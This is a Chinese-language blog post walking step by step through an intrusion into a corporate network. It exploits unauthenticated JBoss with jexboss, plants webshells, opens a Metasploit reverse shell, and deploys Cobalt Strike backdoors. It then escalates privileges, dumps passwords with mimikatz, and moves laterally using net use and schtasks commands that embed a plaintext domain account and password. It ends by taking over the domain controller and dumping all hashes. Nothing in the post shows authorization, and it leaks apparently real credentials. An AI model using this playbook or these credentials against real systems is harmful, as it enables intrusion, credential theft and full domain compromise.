一次內網實戰記錄

公網JBoss getshell

JBoss未授權訪問，進入JBoss管理控制臺可以通過加載遠程的war來部署木馬。

可以手工寫入webshell，但是我使用手測出報錯。

可以使用下面的exp，jexboss還是非常好用的，可以反彈msf，也可以代理模式運行。

https://github.com/joaomatosf/jexboss.git

通過jexboss成功執行getshell，但是這里想要能夠進行文件上傳等操作，所以還是需要一個webshell。可以使用echo命令將webshell寫到jboss的web目錄下。可以從jmx控制臺找到這個web目錄。

echo [寫入的內容] >> C:/Portals/JBoss/jboss-6.1.0.Final/common/deploy/jmx-console.war/1.jsp

注意：

echo命令如果遇到特殊符號如< 、>需要在其前面加一個^表示轉義。

有未授權的jboss版本較低，相對應的java版本也可能較低，盡量使用哥斯拉的jsp一句話木馬。冰蝎木馬在實測中可能會無法運行。

測試過程中，使用jexboss執行命令之后，文件一直都訪問不到。所幸jexboss提供反彈shell給msf的功能。

msf設置好監聽，在jexboss提供的shell中輸入如下命令即可。

jexremote=ip:port

在msf的shell中寫入文件成功，添加到哥斯拉。

淦，雖然哥斯拉連上了webshell，執行命令卻返回一堆亂碼，不過好在還有msf的shell在。

查看系統的相關信息

whoami mysql\mysql

systeminfo windows7 x64

tasklist 查看進程在線殺軟對比一下，這臺機器沒有殺軟

ok了解到上面的相關信息后，就可以進行cs上線了。雖說沒有殺軟還是小做了一下免殺哈。哥斯拉文件上傳配合msf執行，成功CS上線，現在算是進入內網了。

域滲透

本機提權

在CS上線后，在這里做的第一件事情是提權。低權限級別可能在后續的一些測試中受到限制，所以需要盡可能的提權。

當前上線的用戶為mysql\mysql，這個用戶是在本地管理員組的，其實權限已經很大了，但是還是希望可以提權到SYSTEM級別。

這里通過派生會話給MSF，使用getsystem提權成功。

再通過MSF執行之前上傳的CS木馬，即可system上線。當然提權成不成功也不要緊，我們還可以以此服務器攻擊其他服務機器。

內網信息收集

有了第一臺內網機器的權限后，下一步就是很關鍵的信息收集。

首先要查看當前機器的系統信息、本機的網絡環境、收集域內的相關信息，包括所有的計算機、以及一些組信息，下面列出了一些常用的命令和作用。當然也可以借助CS插件和一些工具對內網進行掃描來收集信息，例如fscan、cs插件巨龍拉冬。

ipconfig、systeminfo、

net view /domain 查看有幾個域

net user /domain 查看域用戶

net view /domain[:domain_name] 查詢指定域內的機器

net group /domain 查詢域里的組

net group “group_name” /domain 查詢域內指定組的用戶

eg:net group “domain admins” 查詢域管理員

net group "domain computers"查詢域內所有主機名

（這里的組名和操作系統語言有關系）

內網中有幾個域

查詢INTEGRAL域內主機，這里我們已經看到了機器名為INTAD的機器，應該就是域控了。

查詢內網主機名和掃描內網存活主機

同時這臺機器是windows7的機器，并且沒打補丁，所以可以使用mimikatz抓取明文密碼。

但是由于這臺機器位于工作組內，接下來的首要目標還是移動到域內的機器上。

內網移動

206

通過對內網的探測，發現192.168.0.206也是一臺MySQL服務，同時再206上面也開開了JBoss服務，不過只能內網訪問。先不管三七二十一，因為存在Jboss原因可以使用相同的方法上線206這臺機器。

使用frp搭建內網穿透，上面也介紹過我們的Jexboss.py這個exp是支持代理的，只需要運行命令后面加上參數-P和代理URL即可。很快就拿到了內網第二臺機器，這臺機器的用戶也為MySQL，同時權限也是僅是本地管理員的權限，同樣也不在域內。。。還是先提權吧。

使用ms14-058成功提權到SYSTEM級別，同樣的windows7系統，使用mimikiatz抓取明文密碼。這里使用MySQL權限抓不到密碼，在提權后抓到了明文密碼。（能提權還是盡可能提權）

這里抓到了域用戶的賬號和密碼。還是挺驚喜的。結合后面的ip判斷，應該可以使用該賬戶登錄到192.168.0.10這臺機器。

這里嘗試了使用ipc文件共享來傳CS后門，并使用計劃任務來完成CS上線

//建立ipc連接

net use \MSUKHAREV2\C$ /u:integral\dlyalin 1990IntegraL1990

//將CS后門復制到.10這臺機器的共享路徑

copy c:\Inbox\ctest.exe \MSUKHAREV2\C$

//查看目標當前時間

net time \MSUKHAREV2

//使用schtasks為遠程計算機添加計劃任務，執行Cs后門上線

schtasks /Create /SC ONCE /ST 14:13 /TN pos /TR c:\ctest.exe /S 192.168.0.10 /u integral\dlyalin /p 1990IntegraL1990

域內機器上線成功，，下面收集域內信息

查詢域內組信息

查詢域控制組的成員，此時發現這里用戶integral\dlyalin就是域控組的成員。。。阿這。

域控getshell

前面收集信息時，已經得知域控的電腦名為INTAD，查找域控的方法也很多了，可以用nslookup查一下DNS服務區，一般DNS部署在域控上。這里直接ping一下這個名字就可以獲得ip。

再次使用IPC來上傳CS后門，并設置定時任務上線CS。

不過這里似乎有一些設備限制域控機器的外連，還沒有執行命令就已經連不上了。這里需要使用內網上線的機器轉發一個監聽，再生成后門上傳到域控即可上線。

上線之后可以使用CS的svc-exe來提權，即可獲得sytstem級別權限。

拿到域控的權限，接下來可以直接dump域內所有用戶的hash了，此時就可以暢游內網了。（偷笑）

總結

這次內網實戰，首先是拿到了一臺可以外網訪問到的JBOSS機器進入內網；之后通過內網存在的Web應用（JBOSS）橫向移動第二臺機器中；在機器二中獲得了域內一賬號的明文密碼和相應的機器IP（其實這時獲得的是內網域控的賬號密碼他能登錄域內的機器，只是當時沒想到居然是域管理員的賬號密碼）；通過這個賬號密碼使用IPC入侵，上線了第三臺機器；最后登錄到域控機器通過提權獲得了integral.local域控權限。

感謝觀看！！給個關注就更好了~

MySQL 網站

版權聲明：本文內容由網絡用戶投稿，版權歸原作者所有，本站不擁有其著作權，亦不承擔相應法律責任。如果您發現本站中有涉嫌抄襲或描述失實的內容，請聯系我們jiasou666@gmail.com 處理，核實后本網站將在24小時內刪除侵權內容。